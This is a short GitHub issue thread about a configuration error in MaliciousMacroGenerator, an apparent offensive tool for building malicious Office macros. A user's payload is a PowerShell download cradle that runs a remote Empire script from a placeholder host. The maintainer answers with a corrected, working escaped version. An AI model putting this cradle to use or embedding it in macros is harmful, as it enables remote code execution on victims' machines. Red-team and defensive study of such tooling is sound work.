### ISSUE TITLE
error

### ISSUE THREAD

**Issue by PandoraSec** [Mr-Un1k0d3r/MaliciousMacroGenerator#8]
when i try to generate the vbs file, this error happens
![selection_037](https://user-images.githubusercontent.com/22203976/30781002-aefb0c7c-a0d4-11e7-9791-9b31089cc7d2.png)

i already set my powershell payload in the json file, i try too put the exact location like this:
![selection_035](https://user-images.githubusercontent.com/22203976/30780992-75cd6382-a0d4-11e7-9ab2-3b2df36c6d21.png)

but still doesnt work
i use kali linux and python 2.7
in addition, in the image, i use vbs in the output. but i already try with vba and i have the same error
and my payload is
"payload": "powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://mydns/empire.ps1')""

**Comment by Mr-Un1k0d3r** [comment]
The double quotes in your payload need to be escaped:

"payload": "powershell -nop -c \"iex(New-Object Net.WebClient).DownloadString('http://mydns/empire.ps1')\""
